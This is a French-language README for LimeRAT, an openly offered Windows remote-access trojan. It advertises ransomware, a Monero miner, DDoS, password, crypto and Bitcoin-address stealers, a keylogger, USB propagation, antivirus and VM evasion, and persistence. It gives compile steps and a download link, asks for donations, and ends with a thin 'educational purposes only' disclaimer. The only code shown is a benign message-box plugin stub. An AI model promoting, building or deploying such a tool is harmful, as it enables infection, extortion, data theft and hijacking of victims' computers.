Obsolète. Archivez-le au lieu de le supprimer
LimeRAT v0.1.9
Outil d'administration à distance pour Windows
Description
RAT simple mais puissant pour machines Windows. Ce projet est simple et facile à comprendre. Il devrait vous donner une connaissance générale des malwares .NET et de leur comportement.
Principales fonctionnalités
- .NET
- Codé en Visual Basic .NET, le client nécessite la dépendance framework 2.0 ou 4.0, et le serveur est en 4.0
- Connexion
- Utilisation de pastebin.com comme ip:port, au lieu du DNS noip.com. Et aussi utilisation de multi-ports
- Plugin
- Utilisation d'un système de plugins pour réduire la taille du stub et diminuer la détection antivirale
- Chiffrement
- La communication entre le serveur et le client est chiffrée avec AES
- Propagation
- Infecte tous les fichiers et dossiers sur les clés USB
- Contournement
- Faible détection antivirale et méthode de démarrage indétectée
- Léger
- La taille de la charge utile est d'environ 25 Ko
- Anti machines virtuelles
- Se désinstalle si la machine est virtuelle pour éviter le scan ou l'analyse
- Ransomware
- Chiffre les fichiers sur tous les disques durs et clés USB avec l'extension .Lime
- Mineur XMR
- Mineur CPU Monero haute performance avec optimisations en fonction de l'inactivité/activité de l'utilisateur
- DDoS
- Crée une attaque DDoS puissante pour rendre un service en ligne indisponible
- Voleur de crypto
- Vole des données sensibles liées aux cryptomonnaies
- Verrouillage d'écran
- Empêche l'utilisateur d'accéder à son interface graphique Windows
- Et plus
- Tâche automatique à la connexion
- Forcer l'activation du RDP Windows
- Persistance
- Gestionnaire de fichiers
- Voleur de mots de passe
- Bureau à distance
- Récupérateur de Bitcoin
- Téléchargeur
- Keylogger
Prérequis
Pour ouvrir le projet, vous avez besoin de :
- Visual Studio 2017
- Ce dépôt
Aperçu
Projet
Ransomware
Processus critique
Exemple de plugin
VB.NET
'Easy to create a DLL plugin
Public Class Main
'Simple Msgbox
Public Shared Sub CN(ByVal H As String, ByVal P As Integer, ByVal K As String, ByVal SP As String, ByVal PW As String, ByVal FP As String, ByVal HW As String, ByVal BT As String, ByVal PB As String)
Msgbox("Hello Client!")
Send("MSG" + SPL + "Hello Server!")
'Client will send msg back to server, MSG will be showen in [LOG] Tab
End Sub
End Class
C#
public class Main
{
// Simple Msgbox
public static void CN(string H, int P, string K, string SP, string PW, string FP, string HW, string BT, string PB)
{
Msgbox("Hello Client!");
Send("MSG" + SPL + "Hello Server!");
// Client will send msg back to server, MSG will be showen in [LOG] Tab
}
}
Test
- Ouvrez "LimeRAT.sln"
- Réglez le compilateur en mode "Debug"
- Dans l'Explorateur de solutions, faites un clic droit sur "Solution LimeRAT Project" et appuyez sur "Rebuild Solution"
- Appuyez sur le bouton Exécuter. Notez que le client et le serveur sont en localhost
Compilation
- Ouvrez "LimeRAT.sln"
- Réglez le compilateur en mode "Release"
- Dans l'Explorateur de solutions, faites un clic droit sur "Solution LimeRAT Project" et appuyez sur "Rebuild Solution"
- Tout sera dans "\Project_EXE\Release"
- Convertissez stub.exe en stub.il en utilisant Ildasm
Téléchargement du code source et de la version compilée
https://github.com/NYAN-x-CAT/Lime-RAT/releases
Ce projet a été testé uniquement en laboratoire local [LAN]. Je ne l'ai pas testé en laboratoire externe [WAN].
Le serveur a été testé sur Windows 10, le client sur une machine virtuelle Windows 7.
Remarques
- Lors de l'utilisation du ransomware, le point de restauration ne sera pas supprimé à moins que la charge utile ne s'exécute avec des privilèges élevés
- Anti-Kill (BSOD) ne fonctionnera pas sauf si la charge utile s'exécute avec des privilèges élevés
Vous avez trouvé un bug ? Veuillez le signaler ici https://github.com/NYAN-x-CAT/Lime-RAT/issues/new
Auteur
Donation
Offrez-moi un café !
- XMR :
49H8Kbf15JFN2diG5evGHA5G49qhgFBuDid86z3MKxTv59dcqySCzFWUL3SgsEk2SufzTziHp3UE5P8BatwuyFuv1bBKQw2
- BTC :
12hTx7u7AqdNr8qo4UFuLwb6XAVjoDioax
Support
Avertissement
Moi, le créateur, ne suis pas responsable des actions ou des dommages causés par ce logiciel.
Vous assumez l'entière responsabilité de vos actions et reconnaissez que ce logiciel a été créé à des fins éducatives uniquement.
Le but principal de ce logiciel n'est PAS d'être utilisé de manière malveillante, ou sur un système que vous ne possédez pas, ou pour lequel vous n'avez pas le droit d'utilisation.
En utilisant ce logiciel, vous acceptez automatiquement ce qui précède.
Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.